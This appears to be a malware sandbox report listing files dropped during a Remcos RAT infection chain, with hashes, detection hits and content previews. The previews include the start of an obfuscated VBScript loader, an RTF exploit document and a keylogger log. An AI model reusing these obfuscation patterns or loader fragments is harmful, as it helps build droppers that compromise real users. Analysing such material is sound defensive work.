            SHA-512:14932C5BA635ADE73AAB052CA8306A0B60CBBB3A25431A9A2FBD804CF408EFCC035A3EEBE8DBEE3F4DFB652927CB6AD1AD2D58AAB8A7E1D24824DD0459F96967
            Malicious:false
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):4760
            Entropy (8bit):4.834060479684549
            Encrypted:false
            SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
            MD5:838C1F472806CF4BA2A9EC49C27C2847
            SHA1:D1C63579585C4740956B099697C74AD3E7C89751
            SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
            SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
            Malicious:false
            Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):64
            Entropy (8bit):0.34726597513537405
            Encrypted:false
            SSDEEP:3:Nlll:Nll
            MD5:446DD1CF97EABA21CF14D03AEBC79F27
            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
            Malicious:false
            Preview:@...e...........................................................
            Process:C:\Windows\SysWOW64\wscript.exe
            File Type:ASCII text, with very long lines (11197), with CRLF line terminators
            Category:dropped
            Size (bytes):13274
            Entropy (8bit):4.566436252538346
            Encrypted:false
            SSDEEP:384:o7dvuFVAt959rO6YCATd+milG0Od3Ne/pH+H0RvYVpPgRqVNcbREUJ+K2jhwZWhP:tVSXFO6+TgllGvd3Ne/gUCVN29EUJ+Kq
            MD5:A79C811B3E190B13B99F0E01B5657292
            SHA1:814F608A80ADDEEF1B4DB664CEC0E98F5913C53F
            SHA-256:C6A02F20BF89DDBD0FCD09BA2FBDE3F384C17CB33FA7EB03C57FEA6C11DF6653
            SHA-512:34A538CAB69BD50EBFDEDCE9C65DE801A5ABA10F1D57981F70A271BE8A5474E0D7148F3B0F6455CE02200A7DF2D27CEF3471BDAE5C11F6ECDAE8E473D5001203
            Malicious:false
            Preview:.. dim asneirada , desanuviar , tensor , limoeiro , alfol , Cama , alfol1.. desanuviar = " ".. tensor = "" & limoeiro & desanuviar & limoeiro & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & limoeiro & desanuviar & limoeiro & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & limoeiro & desanuviar & limoeiro & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & limoeiro & desanuviar & limoeiro & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & limoeiro & desanuviar & limoeiro & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & limoeiro & desanuviar & limoeiro & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & limoeiro & desa
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:ISO-8859 text, with very long lines (6956), with CRLF, CR, LF line terminators
            Category:dropped
            Size (bytes):35284
            Entropy (8bit):3.7937836945977628
            Encrypted:false
            SSDEEP:768:nkGIquUU/zwBePWi7KBm2J8V0pdnw7h+5ck:kGIqu7/zAA37Ko2Jy0pFGk
            MD5:D92D4F4A1D9DD4151B48DBA9C911BE5E
            SHA1:41391287E7442A0629BEBCEE4A09B5C751C3334A
            SHA-256:4BB44D988825A04032C6E4ED62A631698DDDEE523CB1EFE0AD6422492B939463
            SHA-512:5E422753E2DDAC52698BD07582404EFFD943ACABB9D48EF3F37D6EAD1EC6C1883329C597208B6E963DD172C3514A89CDF2CCBF395147646BEDCDF976F5EB4663
            Malicious:true
            Yara Hits:
            • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].doc, Author: ditekSHen
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:{\rt..........{\*\xmltagtype777384574 \[}.{\7597157310)2-^).?;`+9[&%>*%.3<?>'&-?><]?:9<?$%>+>&.*/?7?.@>_^_;^9~@*!:?8',).|;2$](%)4'5.#-%][..?%..?.$8`?04*-%?86)!5?*.&.9%%52?9?].'?)?(#[?8,,6_&.1-&3~?!^7.%'?_:@<.6.)#._#7_@;.*=/6!&<#).3**=;#.<`7..^/(**3140%'.%$.;/9/-`?'5^$<30&[?)&(~4.+*2)?>`<$>#)^(3??=?$>^%'&:?:[2|[<`?%?375#4?^85:0566--[:9*^-|<<,/9>,^;]!$'?]^#.3>,.0=81?5%?=?>#=(;++&4?1?]7>(,.^33.7*6[3])~4?['&@%?|$#:)^?='~@*.|?/*%0:9>&.@?#.!|._^3?>3.4.?[]7%~=*0?~?5|#|>2*:0~%[!?*%?*.?]8<9>*:.=%-*>,<_&/+&!.#?:+~''>??$,?|??0?*/@'..!8?+?^483[-:#.13]=.)?.#100=_<?6&*%@<5@^)%3@<?*%-]?).!3#%^|_8.[/);6+?.7*|?.$$|.2?(1^6-!%://](7`.8<<98.&.*(>*3+~^1.!%-2'/~38?9:?[&-3#].-33[9?&`.??(<?&(:-@@5,?06*<??`?^+7!3@?^%|.2=<=0@]<.!?320?-.!.?_[^=`[39*?&2`6(5$/^_=8*/:#0-@&<<?_+[[:.=[6]3(;>??.2?7*(8|=3&?01?$!>(>?/)*8?_&7?/_(;~.',>?<8*_(.+%!2_??9^|=5?@?9%(5;.~_'[?7$5%?:/^+[-?%,3|_.?!4)-8^~76$!+57%.[+:4..*_?/.(=`4>27]!.7+8(]8.5.%/%+159_=1.9,?2^1)@8.?|?[8)399~0)7:|]-[>?3!1%06@>*0_0-..>@?]&$$4?]7=%=[?[$|*|#>=0!.?|%%16)[
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):156322
            Entropy (8bit):3.2657606017650114
            Encrypted:false
            SSDEEP:1536:Eokd99CObC6iLcme9aJK6CUrQhfW0/5JZUlBcNBg0BAbUZlu9gISsRQ:LkdvaJK62/2czg0BAcv
            MD5:AF216517B1AC9254BCFF5C37E6E80752
            SHA1:A5BED501BC6EC2A6E555D96FF175910CADB10B81
            SHA-256:AA849B703BB5635313B8CABE1F08C6BB0F5BCE5FA9D75260DA988584DA7A7471
            SHA-512:3ACDBF49F9D7A6E466E309E49CA66B9EB911F47B686E9753AC4DC23EE8149D330F767E79A808844CE1E2462153A4580B60D2D280FB1B29DC1855EF61AD675F82
            Malicious:false
            Preview:......F.u.n.c.t.i.o.n. .W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e.(.d.t.m.E.v.e.n.t.D.a.t.e.).........W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e. .=. .C.D.a.t.e.(.M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .5.,. .2.). .&. ."./.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .7.,. .2.). .&. ."./.". .&. .L.e.f.t.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .4.). ._.....&. .". .". .&. .M.i.d. .(.d.t.m.E.v.e.n.t.D.a.t.e.,. .9.,. .2.). .&. .".:.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .1.1.,. .2.). .&. .".:.". .&. .M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. ._.....1.3.,. .2.).).........E.n.d. .F.u.n.c.t.i.o.n.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....F.u.n.c.t.i.o.n. .g.e.t.D.e.s.c.r.i.p.t.i.o.n.(.s.t.
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):963
            Entropy (8bit):5.0179389973066115
            Encrypted:false
            SSDEEP:12:tkluand6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluWdRNuKyGX85jvXhNlT3/7AcV9Wro
            MD5:6B1D67591EF4EACFA44DA4A6EA0650AA
            SHA1:E656CCCB39B6DF75860136F91CDB011FACAB4609
            SHA-256:6AEB14C82544F677D77650FE6144D5B3FDA8669B2C105DA3A3433B4E3EAE8AB1
            SHA-512:DC3D7E3819B11140A7CC11B637C6B74DBD92AFAD377CBE0A2775D6F7D4CB752E7EC888A82F619242887EBA173CFAEC2F2A1926487B05C7418AAA73DD11DF9C6A
            Malicious:false
            Preview:{. "geoplugin_request":"8.46.123.175",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):27232148
            Entropy (8bit):1.7083266128970274
            Encrypted:false
            SSDEEP:1536:G555m5Mc/hu5KBriOUtHNfKcfu50y7eMGn5v1IN6zJ8Tqbb0z88eqlSsQ3+3Zvaq:baZu50yknG/qc+tsLm08lkwCCH/t+93
            MD5:F6C15080574731D3807AC694ED95FA7E
            SHA1:71AA2CF6369AAB3822615A599C383FA034155D5E
            SHA-256:0C78DDCD2FAE40ECAA62210277D58B02A93CB468DA155927F72FFCDB259DE783
            SHA-512:6A8AFBDEDBD0DEAC1BA22D14732416229EBFFE9B47669743F960AA80EF25F3BF350ACDBF494A019BB0317FAAD00787BE265917927B586262D4996BBC277CB175
            Malicious:false
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):27232148
            Entropy (8bit):1.7083266128970274
            Encrypted:false
            SSDEEP:1536:G555m5Mc/hu5KBriOUtHNfKcfu50y7eMGn5v1IN6zJ8Tqbb0z88eqlSsQ3+3Zvaq:baZu50yknG/qc+tsLm08lkwCCH/t+93
            MD5:F6C15080574731D3807AC694ED95FA7E
            SHA1:71AA2CF6369AAB3822615A599C383FA034155D5E
            SHA-256:0C78DDCD2FAE40ECAA62210277D58B02A93CB468DA155927F72FFCDB259DE783
            SHA-512:6A8AFBDEDBD0DEAC1BA22D14732416229EBFFE9B47669743F960AA80EF25F3BF350ACDBF494A019BB0317FAAD00787BE265917927B586262D4996BBC277CB175
            Malicious:false
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:ISO-8859 text, with very long lines (6956), with CRLF, CR, LF line terminators
            Category:dropped
            Size (bytes):35284
            Entropy (8bit):3.7937836945977628
            Encrypted:false
            SSDEEP:768:nkGIquUU/zwBePWi7KBm2J8V0pdnw7h+5ck:kGIqu7/zAA37Ko2Jy0pFGk
            MD5:D92D4F4A1D9DD4151B48DBA9C911BE5E
            SHA1:41391287E7442A0629BEBCEE4A09B5C751C3334A
            SHA-256:4BB44D988825A04032C6E4ED62A631698DDDEE523CB1EFE0AD6422492B939463
            SHA-512:5E422753E2DDAC52698BD07582404EFFD943ACABB9D48EF3F37D6EAD1EC6C1883329C597208B6E963DD172C3514A89CDF2CCBF395147646BEDCDF976F5EB4663
            Malicious:true
            Yara Hits:
            • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.doc, Author: ditekSHen
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:{\rt..........{\*\xmltagtype777384574 \[}.{\7597157310)2-^).?;`+9[&%>*%.3<?>'&-?><]?:9<?$%>+>&.*/?7?.@>_^_;^9~@*!:?8',).|;2$](%)4'5.#-%][..?%..?.$8`?04*-%?86)!5?*.&.9%%52?9?].'?)?(#[?8,,6_&.1-&3~?!^7.%'?_:@<.6.)#._#7_@;.*=/6!&<#).3**=;#.<`7..^/(**3140%'.%$.;/9/-`?'5^$<30&[?)&(~4.+*2)?>`<$>#)^(3??=?$>^%'&:?:[2|[<`?%?375#4?^85:0566--[:9*^-|<<,/9>,^;]!$'?]^#.3>,.0=81?5%?=?>#=(;++&4?1?]7>(,.^33.7*6[3])~4?['&@%?|$#:)^?='~@*.|?/*%0:9>&.@?#.!|._^3?>3.4.?[]7%~=*0?~?5|#|>2*:0~%[!?*%?*.?]8<9>*:.=%-*>,<_&/+&!.#?:+~''>??$,?|??0?*/@'..!8?+?^483[-:#.13]=.)?.#100=_<?6&*%@<5@^)%3@<?*%-]?).!3#%^|_8.[/);6+?.7*|?.$$|.2?(1^6-!%://](7`.8<<98.&.*(>*3+~^1.!%-2'/~38?9:?[&-3#].-33[9?&`.??(<?&(:-@@5,?06*<??`?^+7!3@?^%|.2=<=0@]<.!?320?-.!.?_[^=`[39*?&2`6(5$/^_=8*/:#0-@&<<?_+[[:.=[6]3(;>??.2?7*(8|=3&?01?$!>(>?/)*8?_&7?/_(;~.',>?<8*_(.+%!2_??9^|=5?@?9%(5;.~_'[?7$5%?:/^+[-?%,3|_.?!4)-8^~76$!+57%.[+:4..*_?/.(=`4>27]!.7+8(]8.5.%/%+159_=1.9,?2^1)@8.?|?[8)399~0)7:|]-[>?3!1%06@>*0_0-..>@?]&$$4?]7=%=[?[$|*|#>=0!.?|%%16)[
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):44876
            Entropy (8bit):3.1343257829385616
            Encrypted:false
            SSDEEP:384:Fw/3cpAHrBnorBL7JYquJ8iGKpFF9WYb7rKdh:K/3wgBo108iZqdh
            MD5:2A7D1A6C2C8A418E5A2EEB1F49755A7B
            SHA1:9A39AC711F6A0E144D51038050EE55740DCDBB25
            SHA-256:56096C09C9E8F8DF7AF09BC4A84E702810A7FDCBCBB5DCA7B35E9E3329DEA72A
            SHA-512:954BADF577364944BDCF8A8940B8C877DDF16B2063929CBBD3AEB569518FCF739BDB7CFFC463F5106F53D735616B02815D0F1899AC7C883D27134BAB0B2BCCD7
            Malicious:false
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):16384
            Entropy (8bit):2.654679493525268
            Encrypted:false
            SSDEEP:96:GpMPRFOX1Lw8fw98J5+S93y4VMPCFOv1Lj8fw98J5+S93y4:vPeX1LJfLy4qPzv1LmfLy4
            MD5:3A39BDF6274F8E254FB0848E9FDD5FFC
            SHA1:1B0D5C8E96F10AA5E4250F370D765EBCA3957029
            SHA-256:5BCF64509D6DE46A3611ACF4BB2781AC629D299BC9E692D449DEC4AADE5F209D
            SHA-512:979AD787309E57C0BA8890E57F0D2FB8FB21573A2EBD7ABB8C4BCBBB50FC85BA68B6D39A5221918FFAB2D557B079141B6C477D03EC0054DDD4AF55F76F0E2F88
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):15360
            Entropy (8bit):3.5533971854587154
            Encrypted:false
            SSDEEP:384:7ucpAKC4T7JFshohVrk4udP4ERzv8eqWoO8azOrLZ:awNC4xFs6wR/78eqWouzOfZ
            MD5:30FFF36135AF6C91C615594D33C43EE8
            SHA1:EF54AB17E722D78E6E94C51858E8CB7D068E6065
            SHA-256:5E43D7D245C7A8FA2651CC82BF1620F3EF2D9BF5C2CD7CC8FC6597527E13F3AE
            SHA-512:F1BC0EDB45520F4706D82ED10AF19F8D7642743CDEFB3118EB4C8403D5193C71FC0DD029572145E5AC0125F4329594F8184407B7722BA59E0C60E1A6F9B1A7C6
            Malicious:false
            Preview:................5.9.7.1.5.7.3.1.0.).2.-.^.)...?.;.`.+.9.[.&.%.>.*.%...3.<.?.>.'.&.-.?.>.<.].?.:.9.<.?.$.%.>.+.>.&...*./.?.7.?...@.>._.^._.;.^.9.~.@.*.!.:.?.8.'.,.)...|.;.2.$.].(.%.).4.'.5...#.-.%.].[.....?.%.....?...$.8.`.?.0.4.*.-.%.?.8.6.).!.5.?.*...&...9.%.%.5.2.?.9.?.]...'.?.).?.(.#.[.?.8.,.,.6._.&...1.-.&.3.~.?.!.^.7...%.'.?._.:.@.<...6...).#..._.#.7._.@.;...*.=./.6.!.&.<.#.)...3.*.*.=.;.#...<.`.7.....^./.(.*.*.3.1.4.0.%.'...%.$...;./.9./.-.`.?.'.5.^.$.<.3.0.&.[.?.).&.(.~.4...+.*.2.).?.>.`.<.$.>.#.).^.(.3.?.?.=.?.$.>.^.%.'.&.:.?.:.[.2.|.[.<.`.?.%.?.3.7.5.#.4.?.^.8.5.:.0.5.6.6.-.-.[.:.9.*.^.-.|.<.<.,./.9.>.,.^.;.].!.$.'.?.].^.#...3.>.,...0.=.8.1.?.5.%.?.=.?.>.#.=.(.;.+.+.&.4.?.1.?.].7.>.(.,...^.3.3...7.*.6.[.3.].).~.4.?.[.'.&.@.%.?.|.$.#.:.).^.?.=.'.~.@.*...|.?./.*.%.0.:.9.>.&...@.?.#...!.|..._.^.3.?.>.3...4...?.[.].7.%.~.=.*.0.?.~.?.5.|.#.|.>.2.*.:.0.~.%.[.!.?.*.%.?.*...?.].8.<.9.>.*.:...=.%.-.*.>.,.<._.&./.+.&.!...#.?.:.+.~.'.'.>.?.?.$.,.?.|.?.?.0.?.*./.@.'.....!.8.?.+.?.^.4.8.3.
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.05390218305374581
            Encrypted:false
            SSDEEP:3:ol3lYdn:4Wn
            MD5:5D4D94EE7E06BBB0AF9584119797B23A
            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
            Malicious:false
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            File Type:data
            Category:dropped
            Size (bytes):1018
            Entropy (8bit):3.5872003589764274
            Encrypted:false
            SSDEEP:24:6gcOMhJvHU1D8vHU1BTWqJJIWPJKvHU1Bu2WIt6Mcl:vcOoJvHU14vHU1BTWaIWRKvHU1Bu2WI2
            MD5:B002784E7EE64BCCE32DCEDB01AD1D48
            SHA1:47613AA7A3A3AA5E84300EC7BFC45C9695AA9A46
            SHA-256:261AA147E19AFF46E454AB0BA9D8D269CAE208A2A4B4AAA27435A1C238F93F84
            SHA-512:E034AFE7E8D6960BCED880CF1061C6AE5EB7FA84238CE8F04AFE0986AE2854A12E0C091C56EF3308FE0E911D1C802883CE8199B90D0CF30CA33161B25A08444C
            Malicious:true
            Yara Hits:
            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\note\nots.dat, Author: Joe Security
            Preview:....[.2.0.2.4./.0.5./.2.7. .0.3.:.0.0.:.5.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.n.L.N.G. .[.R.e.a.d.-.O.n.l.y.]. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .R.e.f.1.9.9.2.0.8.3.0.2.8.1.9.8.2.9.3.8.R.T.].....[.W.i.n.].r.....[.R.u.n.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .R.e.f.1.9.9.2.0.8.3.0.2.8.1.9.8.2.9.3.8.R.T. . .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.].].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.W.i.n.d.o.w.s. .S.c.r.i.p.t. .H.o.s.t.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.W.i.n.d.o.w.s. .S.c.r.i.p.t. .H.o.s.t.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .R.e.f.1.9.9.2.0.8.3.0.2.8.1.9.8.2.9.3.8.R.T. . .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.].].........[.M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .1.4.3.4.6. .m.i.
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.025611256926842164
            Encrypted:false
            SSDEEP:6:I3DPcbsXHvxggLR6h+g28ze23RXv//4tfnRujlw//+GtluJ/eRuj:I3DPZPuog28ze2RvYg3J/
            MD5:9F03544288A66AFC3D87720A475A2C3F
            SHA1:F958F8BD2FAD4FFE49CE4163C61AA5B5139B4491
            SHA-256:5ACE0656917DA8471C8597D881869E28006710BC45C2396A46187FD99300F62A
            SHA-512:C16239620175928CCBD6DD80AD99CE55D38411C5A66DB18417621C202AE3008832DE13347376C820B6C5BC821550D2B9FB6E5359BE6F83E49CB8863229D892D2
            Malicious:false
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.02561327614152181
            Encrypted:false
            SSDEEP:6:I3DPczkx9vxggLRVefUIxnCtDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPKkRQPg3vYg3J/
            MD5:9BAA85916F08F558262C035291B86B95
            SHA1:437B9E6B79B0ED9F29284622B30A3D00C2F328D7
            SHA-256:1274B9503A3133A301FBE723FCCEA8C66BB38C31DE992ADBC0B87EA2AA1ABC92
            SHA-512:14932C5BA635ADE73AAB052CA8306A0B60CBBB3A25431A9A2FBD804CF408EFCC035A3EEBE8DBEE3F4DFB652927CB6AD1AD2D58AAB8A7E1D24824DD0459F96967
            Malicious:false
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):16384
            Entropy (8bit):1.0004922970899908
            Encrypted:false
            SSDEEP:48:mjWaNg3ZdMvvNrUWAUz5ZVgp9CyCU0FkQSbQ0uw/prMl:mj43ZdM9rUzUz6uUpU0uwul
